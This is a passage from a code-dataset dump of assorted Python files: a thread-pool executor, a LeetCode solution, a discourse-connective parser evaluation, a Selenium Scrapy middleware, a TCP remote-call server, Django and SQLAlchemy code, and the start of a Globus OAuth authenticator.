task.execute(self.local_data)\n while not self.queue.empty():\n task = self.queue.get()\n task.execute(self.local_data)\n self.empty.set()\n\n def join(self):\n self.thread.join()\n\n def _shutdown(self, local_data):\n self.running = False\n hook = local_data.get('exit_hook')\n if hook is not None:\n hook(self.local_data)\n\n def shutdown(self):\n task = Task(0, self._shutdown)\n self.submit(task)\n\n def wait(self):\n self.empty.wait()\n\nclass TaskExecutorService(object):\n def __init__(self, max_workers):\n self.max_workers = max_workers\n self.workers = []\n for i in range(0, self.max_workers):\n self.workers.append(TaskExecutor(i))\n\n def submit(self, task):\n worker = self.workers[task.taskid % self.max_workers]\n worker.submit(task)\n\n def shutdown(self):\n for worker in self.workers:\n worker.shutdown()\n\n def wait(self, taskid):\n worker = self.workers[taskid % self.max_workers]\n worker.wait()\n","sub_path":"oxfs/task_executor.py","file_name":"task_executor.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"429603127","text":"from functools import lru_cache\n\nclass Solution:\n def mincostTickets(self, days: List[int], costs: List[int]) -> int:\n \n duration = [1,7,30]\n dayset = set(days)\n \n @lru_cache(None)\n def dp(i):\n if i>365:\n return 0\n elif i in dayset:\n return min(dp(i+d)+c for c,d in zip(costs, duration))\n else:\n return dp(i+1)\n \n return dp(1)","sub_path":"983_minCost_tickets.py","file_name":"983_minCost_tickets.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"308152025","text":"a = eval(input('Please enter the frequency of the radiation: '))\r\nb = [3 * 10**9, 3 * 10**12, 4.3 * 10**14, 7.5 * 10**14, 3 * 10**17, 3 * 10**19]\r\nc = ['radio waves', 'microwaves', 'infrared light', 'visible light', 'ultraviolet light', 'x-rays', 'gamma rays']\r\nif a >= 3 * 10**19:\r\n d = 'gamma rays'\r\nfor i in range(6):\r\n if a < b[i]:\r\n d = c[i]\r\n break\r\nprint(d)\r\n ","sub_path":"055.py","file_name":"055.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"625621847","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 15:19:16 2020\n\n@author: ida\n\"\"\"\n\nimport pandas as pd\nimport json\nimport spacy\nimport re\nimport os\nfrom string import punctuation\n\n#give the pattern of each explicit word\nen_dependency_patterns = {\n # S2 ~ S2 head (full S head) ---> connective\n \"after\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n {\"S1\": \"acl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"also\": [\n {\"S1\": \"advcl\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n ],\n \"although\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"and\": [\n {\"S1\": \"conj\", \"S2\": \"cc\", \"POS\": \"CC\", \"flip\": True},\n ],\n \"as\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"before\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"but\": [\n {\"S1\": \"conj\", \"S2\": \"cc\", \"POS\": \"CC\", \"flip\": True},\n ],\n \"so\": [\n # {\"S1\": \"parataxis\", \"S2\": \"dep\", \"POS\": \"IN\", \"flip\": True},\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"RB\"},\n ],\n \"still\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n {\"S1\": \"dep\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n ],\n \"though\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"because\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"however\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n # {\"S1\": \"ccomp\", \"S2\": \"advmod\", \"POS\": \"RB\"}, ## rejecting in favor of high precision\n ],\n \"if\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"meanwhile\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\"},\n ],\n \"while\": [\n {\"S1\": \"advcl\", \"S2\": \"mark\", \"POS\": \"IN\"},\n ],\n \"for example\": [\n {\"S1\": \"parataxis\", \"S2\": \"nmod\", \"POS\": \"NN\", \"head\": \"example\"},\n ],\n \"then\": [\n {\"S1\": \"parataxis\", \"S2\": \"advmod\", \"POS\": \"RB\", \"acceptable_order\": \"S1 S2\"},\n ],\n \"when\": [\n {\"S1\": \"advcl\", \"S2\": \"advmod\", \"POS\": \"WRB\"},\n ],\n}\n\n\ndef extract_pattern(dependency_patterns):\n patterns = []\n conn = []\n for each_conj in dependency_patterns:\n for each_pattern in dependency_patterns[each_conj]:\n# try:\n# if each_pattern['flip']==True:\n# patterns.append([each_conj, each_pattern['S1'], each_pattern['S2'], each_pattern['POS']])\n# conn.append(each_conj)\n# except:\n patterns.append([each_conj, each_pattern['S2'], each_pattern['S1'], each_pattern['POS']])\n conn.append(each_conj)\n return patterns, conn\n\ndef run_syntactic(filepath):\n patterns, conn = extract_pattern(en_dependency_patterns)\n conn.append('for')\n \n pred_df = pd.DataFrame(columns=['Offset-raw', 'filename', 'ConnSpanList'])\n all_connectives = []\n for filename in os.listdir(filepath):\n# print(filename)\n# all_connectives = []\n json_path = filepath + filename + '/pdtb-parses.json'\n with open(json_path) as f:\n f_input = json.load(f)\n for sent in f_input[filename]['sentences']:\n temp_dict = {}\n for word in sent['dependencies']:\n temp_dict[word[2]] = {'dep':word[0], 'head':word[1], 'pos':sent['words'][int(word[2].split(\"-\")[-1])-1][1]['PartOfSpeech'], \n 'begin': sent['words'][int(word[2].split(\"-\")[-1])-1][1]['CharacterOffsetBegin'], \n 'end': sent['words'][int(word[2].split(\"-\")[-1])-1][1]['CharacterOffsetEnd']}\n \n for word in temp_dict:\n norm_word = ' '.join(word.split('-')[:-1]).lower()\n if norm_word in conn: \n if temp_dict[word]['head'] != 'ROOT-0':\n pattern = []\n if norm_word == 'for':\n if temp_dict[word]['head'] == 'example':\n pattern = ['for example', temp_dict[word]['dep'].split(\":\")[0], temp_dict[temp_dict[word]['head']]['dep'].split(\":\")[0], temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n else:\n pattern = [norm_word, temp_dict[word]['dep'].split(\":\")[0], temp_dict[temp_dict[word]['head']]['dep'].split(\":\")[0], temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n# try:\n# if pattern[0] == 'and':\n# print(\">>>AND\")\n# if pattern in patterns:\n# print(\"YES!\")\n# except:\n# pass\n if pattern in patterns:\n# if pattern[0] == 'and':\n# print(\"UYEEEE\")\n## print(pattern)\n word_span = str(temp_dict[word]['begin']) + '..' + str(temp_dict[word]['end'])\n pred_df = pred_df.append({'Offset-raw':norm_word, \n 'filename':filename, \n 'ConnSpanList': word_span}, ignore_index=True)\n else:\n pattern = [norm_word, temp_dict[word]['dep'].split(\":\")[0], 'root', temp_dict[word]['pos']]\n if pattern not in all_connectives:\n all_connectives.append(pattern)\n \n pd_all_connectives = pd.DataFrame(all_connectives, columns = ['conn', 'dep-1', 'dep-2', 'POS']).sort_values(by=['conn'])\n print('Finish the extraction')\n return pred_df, pd_all_connectives\n#%%\ndef evaluate(gold_df, pred_df):\n print('Evaluating result...')\n ##choose pred that the connective are covered by the syntactic parser only \n slicing_gold_idx = []\n for i in gold_df.index:\n if gold_df.loc[i]['Offset-raw'] in en_dependency_patterns.keys():\n slicing_gold_idx.append(i)\n \n pred = pred_df.values.tolist()\n new_gold = gold_df.loc[slicing_gold_idx]\n gold = new_gold.values.tolist()\n tp = [value for value in gold if value in pred]\n fn = [value for value in gold if value not in pred]\n fp = [value for value in pred if value not in gold]\n \n prec = len(tp)/len(pred)\n rec = len(tp)/len(gold)\n print(\"true positive\\t: \", len(tp))\n print(\"false negative\\t: \", len(fn))\n print(\"false positive\\t: \", len(fp))\n print('Precision\\t: ', prec)\n print('Recall\\t\\t: ', rec)\n print('F1 score \\t: ', 2*prec*rec/(prec+rec))\n \n tpdf = pd.DataFrame(tp, columns=['Offset-raw', 'filename', 'ConnSpanList'])\n \n return new_gold, tpdf\n#%%\ndef extract_spice_pred(pred_df):\n nlp = spacy.load(\"en\")\n raw_path = \"../../data/SPICE/raw/\"\n \n all_pred = pd.DataFrame()\n for each_file in pred_df['filename'].unique():\n# print(each_file)\n raw_file_path = raw_path + each_file + '.txt'\n pred_file = pred_df[pred_df['filename']==each_file]\n pred_file['start'] = [int(x.split(\"..\")[0]) for x in pred_file['ConnSpanList']]\n pred_file = pred_file.sort_values(['start']).reset_index()\n f_string = open(raw_file_path, 'r', encoding=\"utf-8\", errors=\"ignore\").read()\n doc = nlp(f_string)\n \n docs = [sent for sent in doc.sents]\n results = []\n doc_pivot = 0\n pred_pivot = 0\n while pred_pivot != len(pred_file):\n if (len(doc[:docs[doc_pivot].end].text) > pred_file.loc[pred_pivot]['start']):\n results.append(docs[doc_pivot].text)\n pred_pivot += 1\n else:\n doc_pivot += 1\n pred_file['fullSent'] = results\n all_pred = all_pred.append(pred_file, ignore_index=True)\n return all_pred\n \n#%%\ndef evaluate_spice(gold_df, pred_conn):\n\n print('Evaluating result...')\n \n #choose pred that the connective are covered by the syntactic parser only \n slicing_gold_idx = []\n for i in gold_df.index:\n# print(gold_df.loc[i]['conn'])\n if gold_df.loc[i]['Offset-raw'].lower().strip() in en_dependency_patterns.keys():\n slicing_gold_idx.append(i)\n \n gold_df = gold_df.loc[slicing_gold_idx]\n \n pred_conn = extract_spice_pred(pred_conn)\n \n pred_dict = {}\n for i in range(len(pred_conn)):\n filename = pred_conn.loc[i][\"filename\"]\n conn = pred_conn.loc[i][\"Offset-raw\"].lower().strip()\n fullSent = pred_conn.loc[i][\"fullSent\"].lower().strip(punctuation).strip()\n if filename not in pred_dict:\n pred_dict[filename] = {}\n pred_dict[filename][conn] = [fullSent]\n elif conn not in pred_dict[filename]:\n pred_dict[filename][conn] = [fullSent]\n else:\n pred_dict[filename][conn].append(fullSent)\n\n #create dictionary from the gold:\n gold_dict = {}\n for i in gold_df.index:\n filename = gold_df.loc[i]['filename']\n conn = gold_df.loc[i]['Offset-raw'].lower().strip()\n fullSent = gold_df.loc[i]['fullSent'].lower().strip(punctuation).strip()\n if filename not in gold_dict:\n gold_dict[filename] = {}\n gold_dict[filename][conn] = [fullSent]\n elif conn not in gold_dict[filename]:\n gold_dict[filename][conn] = [fullSent]\n else:\n gold_dict[filename][conn].append(fullSent)\n\n match_connective = []\n i = 0\n not_found = []\n for filename in gold_dict: \n for conn in gold_dict[filename]:\n for gold_sent in gold_dict[filename][conn]:\n found = False\n if filename in pred_dict:\n if conn in pred_dict[filename]:\n for pred_sent in pred_dict[filename][conn]:\n if (pred_sent in gold_sent or pred_sent in gold_sent):\n match_connective.append([filename, conn, pred_sent])\n found = True\n break\n if found == False:\n not_found.append(conn)\n i+=1\n# if i%100 == 0:\n# print(i) \n \n prec = len(match_connective)/len(pred_conn)\n rec = len(match_connective)/len(gold_df)\n print(\"precision\\t: \", prec)\n print(\"recall\\t: \" , rec)\n print(\"f1-score\\t: \", 2*prec*rec/(prec+rec))\n \n tpdf = pd.DataFrame(match_connective, columns=['filename', 'Offset-raw', 'fullSent'])\n \n return gold_df, tpdf, pred_conn\n \n#%%\nif __name__ == \"__main__\":\n \n patterns, conns = extract_pattern(en_dependency_patterns)\n \n print('Evaluate ted...')\n ted_filepath = '../../data/Ted-Talk/new_conll2015/'\n ted_gold = pd.read_csv('../../result-csv/ted_gold_shifted.csv')\n ted_gold['Offset-raw'] = ted_gold['Offset-raw'].str.lower()\n pred_ted, conn_ted = run_syntactic(ted_filepath)\n new_gold_ted, tp_ted = evaluate(ted_gold, pred_ted)\n# \n# print('Evaluated biodrb...')\n# biodrb_filepath = '../../data/BioDRB/input_biodrb_conll2015/'\n# biodrb_gold = pd.read_csv('../../result-csv/biodrb_gold.csv')\n# biodrb_gold['Offset-raw'] = biodrb_gold['Offset-raw'].str.lower()\n# biodrb_gold['filename'] = biodrb_gold['filename'].apply(str)\n# pred_biodrb, conn_biodrb = run_syntactic(biodrb_filepath)\n# new_gold_biodrb, tp_biodrb = evaluate(biodrb_gold, pred_biodrb)\n# \n# print('Evaluate wsj 23...')\n# wsj_filepath = '../../data/wsj_23/wsj_23_conll2015/conll2015/'\n# wsj_gold = pd.read_csv('../../result-csv/wsj_23_gold.csv')\n# wsj_gold['Offset-raw'] = wsj_gold['Offset-raw'].str.lower()\n# pred_wsj, conn_wsj = run_syntactic(wsj_filepath)\n# new_gold_wsj, tp_wsj = evaluate(wsj_gold, pred_wsj)\n#\n# print('Evaluate spice...')\n# spice_filepath = '../../data/SPICE/conll2015/'\n# pred_spice, conn_spice = run_syntactic(spice_filepath)\n# spice_gold = pd.read_csv(\"../../result-csv/spice_gold.csv\")\n# new_gold, tp_spice, pred_spice = evaluate_spice(spice_gold, pred_spice)\n# \n# %%\n# not_found_files = ['talk_2009_en', 'talk_1978_en']\n# \n# new_gold = []\n# for i in ted_gold.index:\n# conn = ted_gold.loc[i]['Offset-raw']\n# span = ted_gold.loc[i]['ConnSpanList']\n# file = ted_gold.loc[i]['filename']\n# if file not in not_found_files:\n# new_span = str(int(span.split(\"..\")[0])-1) + \"..\" + str(int(span.split(\"..\")[1])-1)\n# new_gold.append([conn, file, new_span])\n# else:\n# new_gold.append([conn, file, span])\n# \n# df = pd.DataFrame(new_gold, columns = ['Offset-raw', 'filename', 'ConnSpanList'])","sub_path":"code/syntactic/syntactic_coreNLP.py","file_name":"syntactic_coreNLP.py","file_ext":"py","file_size_in_byte":12855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"401957179","text":"#coding:utf-8\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom scrapy.http import HtmlResponse\nfrom logging import getLogger\n\nclass SeleniumMiddleware(object):\n\n def __init__(self, timeout=None, service_args=[]):\n self.logger = getLogger(__name__)\n self.timeout = timeout\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--disable-gpu')\n self.browser = webdriver.Chrome(chrome_options=chrome_options)\n self.load_timeout = self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n\n def __del__(self):\n self.browser.close()\n\n def process_request(self, request, spider):\n \"\"\"\n 用Chromedriver抓取页面\n :param request: Request对象\n :param spider: Spider对象\n :return: HtmlResponse\n \"\"\"\n try:\n self.logger.debug('--------Chrome is Starting--------')\n self.browser.get(request.url)\n return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n status=200)\n except TimeoutException:\n self.logger.debug('--------Chrome is Timeout--------')\n self.browser.close()\n self.__init__()\n return HtmlResponse(url=request.url, status=500, request=request)\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(timeout=crawler.settings.get('SELENIUM_TIMEOUT'),\n service_args=crawler.settings.get('CHROMEDRIVER_SERVICE_ARGS'))","sub_path":"huxiu/huSpider/huSpider/middlewares/SeleniumMiddleware.py","file_name":"SeleniumMiddleware.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"401190586","text":"\nimport subprocess\nimport pandas as pd\nimport os\nimport csv\nfrom shlex import split\n\n\n# THIS is understod by PYTHON 3.6, but it's not what I want to do:\n#blob=subprocess.check_output(['sdds2stream', ll[1], '-col=s'],stderr= subprocess.STDOUT).decode('UTF-8')\n\n\n##########################################################################################################\n##########################################################################################################\n### FBT : the below block is the python equivalent of the lattice length calculated in the plott script\n#from subprocess import Popen, PIPE\n#from shlex import split\n#p1 = Popen(split(\"sdds2stream %s -col=s\" %ll[1]), stdout=PIPE)\n#p2 = subprocess.check_output(split(\"tail -1\"), stdin=p1.stdout).decode('UTF-8')\n#\n#print(p2)\n#p3=float(p2)\n#p4=p3*100\n##########################################################################################################\n##########################################################################################################\n\ndd=pd.read_csv('blob.csv')\n\n\n\nd32=dd[['Twi_Files_List']]\n\n\n\ndft2=pd.DataFrame(columns=[['TwissName','LatticeLength']])\n\n\n\n\nk=0\n\nfor nombre in range(0, len(d32)): #len(d32) is the total number in the list of Twiss Files\n fichier=d32.iloc[nombre]['Twi_Files_List']\n \n #df2=pd.read_csv(fichier) no !! coz fichier est un SDDS file pas un csv\n from subprocess import Popen, PIPE\n #from shlex import split\n p1 = Popen(split(\"sdds2stream %s -col=s\" %fichier), stdout=PIPE)\n p2 = subprocess.check_output(split(\"tail -1\"), stdin=p1.stdout).decode('UTF-8') \n print(' ')\n print(' ')\n print(fichier)\n print(p2)\n try:\n p3=float(p2)\n except ValueError:\n p3=-3.1415926999\n \n dft2.loc[nombre,'TwissName']=fichier\n dft2.loc[nombre,'LatticeLength']=p3\n print(nombre)\n\n\n\n\ndft2.to_csv('LatticesLengthsList.csv')\n\n\n\n\ndfcsv = pd.read_csv('LatticesLengthsList.csv',float_precision='round_trip')\n\ndfTemp2=dfcsv['LatticeLength']>561.54\ndfTemp3=dfcsv['LatticeLength']<561.545\n\ndfTemp4=dfcsv[dfTemp2]\ndiad=dfTemp4[dfTemp3]\n\ndiad.to_csv('diadLengths.csv')","sub_path":"e2s_ELEGANT/ExtractTwissList_part2_avec_TL.py","file_name":"ExtractTwissList_part2_avec_TL.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"225037055","text":"from django.urls import path\n\nfrom . import views \n\nurlpatterns = [\n path('delete/', views.delete,name='delete'),\n path('update/', views.update,name='update'),\n path('', views.list,name='list'),\n path('create/', views.create,name='create'),\n]\n","sub_path":"10.crud_delete/sosmed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"282061162","text":"# -*- coding:utf-8 -*-\n__author__ = u'Joël Vogt'\nimport socket\nfrom multiprocessing.dummy import Process, current_process\n\nfrom walkabout.connection import CLOSE_CONNECTION, FLUSH_BUFFER_REQUEST\nfrom walkabout.connection.tcp_socket import MESSAGE_HEADER, HEADER_DELIMITER, MESSAGE_HEADER_END, \\\n get_header_from_message\nfrom walkabout.helpers.datalib import InputStreamBuffer\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# from pathos.multiprocessing import ProcessingPool as Pool\n# from pathos.helpers import cpu_count\n\nTIMEOUT = 10\nSTATE_RUNNING = 0\nSTATE_FINISHING = 1\nSTATE_END_CALL = 2\n\n\ndef _function_process(tcp_client_socket, buffer_size, remote_functions, endpoint):\n input_buffer = None\n total_data_size = 0\n remote_function = None\n \"\"\" return_value == -1 if no function_ref was called.\n None can be returned by functions without explicit return value\"\"\"\n function_ref = None\n frame = None\n next_frame = None\n message = None\n event = None\n state = STATE_RUNNING\n return_value = -1\n is_used_by_client = True\n\n # Locally stored references of commonly used functions and data objects\n f_input_buffer_extend = None\n\n f_str_join = ''.join\n\n f_tcp_socket_receive = tcp_client_socket.recv\n f_tcp_socket_send = tcp_client_socket.send\n\n f_endpoint_to_send = endpoint.to_send\n f_endpoint_to_receive = endpoint.to_receive\n\n while is_used_by_client:\n while is_used_by_client:\n if state == STATE_RUNNING:\n message = f_tcp_socket_receive(buffer_size)\n\n elif state == STATE_FINISHING:\n\n if next_frame:\n message = next_frame\n next_frame = None\n else:\n\n state = STATE_END_CALL\n return_value = -1\n break\n\n if CLOSE_CONNECTION == message:\n is_used_by_client = False\n break\n\n if FLUSH_BUFFER_REQUEST == message[-3:]:\n\n event = FLUSH_BUFFER_REQUEST\n state = STATE_FINISHING\n\n if len(message) > 3:\n message = message[:-3]\n else:\n continue\n if not message:\n is_used_by_client = False\n return_value = -1\n break\n\n if not remote_function:\n if next_frame:\n message = f_str_join([next_frame, message])\n next_frame = None\n if message[:3] != MESSAGE_HEADER:\n return_value = ReferenceError(\n 'Message does not contain header information and a function_ref reference')\n frame = None\n break\n try:\n function_ref, total_data_size, message = get_header_from_message(message)\n remote_function = remote_functions[function_ref]\n input_buffer = InputStreamBuffer(buffer_size=buffer_size)\n f_input_buffer_extend = input_buffer.extend\n\n except IndexError:\n return_value = AttributeError(\"Server side exception: \\\n Remote module doesn't have the function_ref you tried to call\")\n frame = None\n break\n\n diff = total_data_size - (input_buffer.size + len(message))\n if diff < 0:\n next_frame = message[diff:]\n message = message[:diff]\n f_input_buffer_extend(message)\n\n if total_data_size < input_buffer.size:\n frame = None\n return_value = OverflowError(\n 'Server side exception: \\\n The size {0} is longer than \\\n the expected message size {1}'.format(\n input_buffer.size,\n total_data_size))\n\n elif total_data_size == input_buffer.size:\n frame = input_buffer[0:input_buffer.size]\n else:\n continue\n break\n input_buffer = None\n f_input_buffer_extend = None\n if frame:\n args, kwargs = f_endpoint_to_receive(frame)\n frame = None\n try:\n return_value = remote_function(*args, **kwargs)\n except Exception as e:\n e.message = \"server exception {0}\".format(e.message)\n return_value = e\n\n if return_value != -1:\n if isinstance(return_value, Exception):\n is_used_by_client = False\n\n serialized_content = f_endpoint_to_send(return_value)\n return_message = '%(header)s' \\\n '%(delimiter)s' \\\n '%(function_ref)s' \\\n '%(delimiter)s' \\\n '%(message_length)d' \\\n '%(delimiter)s' \\\n '%(header_end)s' \\\n '%(message)s' % \\\n dict(\n header=MESSAGE_HEADER,\n function_ref=function_ref,\n message_length=len(serialized_content),\n message=serialized_content,\n delimiter=HEADER_DELIMITER,\n header_end=MESSAGE_HEADER_END)\n f_tcp_socket_send(return_message)\n remote_function = None\n return_value = -1\n if state == STATE_END_CALL:\n if event:\n f_tcp_socket_send(event)\n event = None\n state = STATE_RUNNING\n f_tcp_socket_send(CLOSE_CONNECTION)\n tcp_client_socket.close()\n\n\nclass Server(object):\n def __init__(self, hostname, port, buffer_size, endpoint):\n self.hostname = hostname\n self.port = port\n self.buffer_size = buffer_size\n self.buffered_methods = []\n self.unbuffered_methods = []\n self._endpoint = endpoint\n self._remote_functions = {}\n self._tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._tcp_server_socket.bind((self.hostname, self.port))\n self._tcp_server_socket.listen(5)\n self._ready = True\n\n def _register_function(self, func, name):\n self._remote_functions[name] = func\n\n\n def run(self):\n while current_process().is_alive():\n tcp_client_socket, _ = self._tcp_server_socket.accept()\n p = Process(\n target=_function_process,\n args=(tcp_client_socket,\n self.buffer_size,\n self._remote_functions,\n self._endpoint))\n p.start()\n self._tcp_server_socket.close()\n\n def __call__(self, networked_func, buffered):\n function_name = networked_func.__name__\n\n def buffered_function(func):\n # if func.func_code.co_argcount == 1 and cpu_count() > 1:\n # def on_call(params):\n # single_arguments = map(lambda x: x[0][0], params)\n # pool = Pool(processes=cpu_count())\n # return pool.map(func, single_arguments)\n # else:\n def on_call(params):\n return [func(*args, **kwargs) for args, kwargs in params]\n\n return on_call\n\n if buffered:\n self.buffered_methods.append(function_name)\n self._register_function(buffered_function(networked_func), name=function_name)\n else:\n self.unbuffered_methods.append(function_name)\n self._register_function(networked_func, name=function_name)\n","sub_path":"walkabout/connection/tcp_socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"427142733","text":"from sqlalchemy.sql.operators import exists\nfrom .userRepositoryContract import UserRepositoryContract\nfrom uuid import uuid4\nfrom ...controllers import AuthController\nfrom ...models import User\nfrom api import db\nfrom sqlalchemy import update,exc\nfrom pprint import pprint\nclass UserRepositorySQLALCHEMY(db.Model,UserRepositoryContract):\n\n __tablename__ =\"users\"\n id=db.Column(db.String(255), primary_key=True)\n nome=db.Column(db.String(200))\n email=db.Column(db.String(200))\n nome_empresa=db.Column(db.String(200))\n telefone=db.Column(db.String(16))\n telefone2=db.Column(db.String(16))\n cpf_cnpj=db.Column(db.String(18))\n data_nascimento=db.Column(db.DateTime)\n sexo=db.Column(db.Enum(\"F\",\"M\"))\n login=db.Column(db.String(45))\n senha=db.Column(db.String(255))\n created_at=db.Column(db.DateTime(timezone=True), server_default=db.func.now())\n updated_at=db.Column(db.DateTime(timezone=True), onupdate=db.func.now())\n deleted=db.Column(db.Integer(),default=0)\n __table_args__= (\n db.UniqueConstraint(\"cpf_cnpj\",\"email\",\"login\"),\n )\n\n\n def __init__(self,user:User) -> None:\n if user.id == None:\n user.id = uuid4()\n \n if hasattr(user, 'senha'):\n user.senha = AuthController().generatePassword(user.senha)\n \n self.id = user.id\n self.nome = user.nome\n self.email = user.email\n self.telefone = user.telefone\n self.telefone2 = user.telefone2\n self.nome_empresa = user.nome_empresa\n self.cpf_cnpj = user.cpf_cnpj\n self.data_nascimento =user.data_nascimento\n self.sexo =user.sexo\n self.senha =user.senha\n self.login=user.login\n self.deleted=user.deleted\n \n def getById(self,id):\n return self.query.get(id)\n \n def getList(self):\n return self.__dict__\n \n def update(self,object:User):\n db.session.query(UserRepositorySQLALCHEMY).filter(UserRepositorySQLALCHEMY.id == self.id).update(object.__dict__)\n db.session.commit() \n\n def save(self):\n user = db.session.query(UserRepositorySQLALCHEMY).filter(\n UserRepositorySQLALCHEMY.cpf_cnpj == self.cpf_cnpj,\n UserRepositorySQLALCHEMY.email == self.email,\n UserRepositorySQLALCHEMY.login == self.login,\n ).first()\n if user !=None:\n return {\n \"id\":user.id,\n \"msg\": \"user already exists\"\n }\n\n db.session.add(self)\n db.session.commit()\n return {\n \"id\":self.id,\n \"msg\":\"created successful\"\n }\n","sub_path":"api/repositories/user/userRepositorySQLALCHEMY.py","file_name":"userRepositorySQLALCHEMY.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"277419050","text":"from django.shortcuts import render#, get_object_or_404\nfrom .models import hospital\nfrom django.db.models import Q\nfrom .form import sellerForm\n\n# Create your views here.\ndef home(request):\n\tqueryset_list = hospital.objects.all()\n\tquery = request.GET.get(\"q\")\n\tform = sellerForm(request.POST or None)\n\t\n\tif query:\n\t\tqueryset_list = queryset_list.filter(Q(name__contains=query))\n\t\tcontext={\"queryset_list\":queryset_list,\"form\":form}\n\t\treturn render(request, \"detail.html\",context)\n\n\treturn render(request, \"index.html\",{})\n\n\ndef getinfo(request):\n\tform = sellerForm(request.POST or None)\n\t#if request.method == \"POST\":\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\n\n\treturn render(request, \"detail.html\", {})\n\n\n\n\n\n#def detail(request):\n#\tinstance= get_object_or_404(hospital, id=1)\n#\tcontext = {\n#\t\t\"name\": instance.name,\n#\t\t\"instance\": instance,\n#\t}\n#\treturn render(request, \"detail.html\",context)\n","sub_path":"web/manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"278140416","text":"\"\"\"\nCustom Authenticator to use Globus OAuth2 with JupyterHub\n\"\"\"\nimport pwd\nfrom tornado import gen, web\nfrom tornado.auth import OAuth2Mixin\nfrom tornado.concurrent import return_future\nfrom tornado.web import HTTPError\nfrom .oauth2 import OAuthLoginHandler, OAuthenticator\n\ntry:\n import globus_sdk\nexcept:\n raise ImportError(\"Trying to use the Globus Auth \"\n \"authenticator, but globus_sdk \"\n \"is not installed\")\n\n\nclass GlobusMixin(OAuth2Mixin):\n \"\"\"\n Overriding the tornado function because\n globus provides it's own method to assemble the\n authorize url\n \"\"\"\n @return_future\n def authorize_redirect(self, client=None, callback=None):\n self.redirect(client.oauth2_get_authorize_url())\n callback()\n\n\nclass GlobusLoginHandler(OAuthLoginHandler, GlobusMixin):\n def get(self):\n # Doing the scope weirdness for the globus_sdk\n scopes = ['openid', 'profile', 'email',\n 'urn:globus:auth:scope:auth.globus.org:view_identities']\n scope_string = (' ').join(scopes)\n redirect_uri = self.authenticator.get_callback_url(self)\n client = self.authenticator.globus_portal_client()\n client.oauth2_start_flow(\n redirect_uri,\n requested_scopes=scope_string,\n refresh_tokens=True)\n self.log.info('globus redirect: %r', redirect_uri)\n self.authorize_redirect(client)\n\n\nclass GlobusOAuthenticator(OAuthenticator):\n\n login_service = \"Globus\"\n login_handler = GlobusLoginHandler\n\n def globus_portal_client(self):\n \"\"\"\n Create an Globus Auth ConfidentialAppAuthClient\n Need a ConfidentialAppAuthClient because the NativeAppClient\n would require user input, i.e. c/p the token from the website\n somewhere, which we wont do... for now.\n \"\"\"\n return globus_sdk.ConfidentialAppAuthClient(\n self.client_id,\n self.client_secret)\n\n @gen.coroutine\n def authenticate(self, handler, data=None):\n \"\"\"\n Overwritting the authenticate method with a Globus Auth specific one\n \"\"\"\n code = handler.get_argument(\"code\", False)\n if not code:\n raise web.HTTPError(400, \"oauth callback made without a token\")\n # TODO: Configure the curl_httpclient for tornado\n scopes 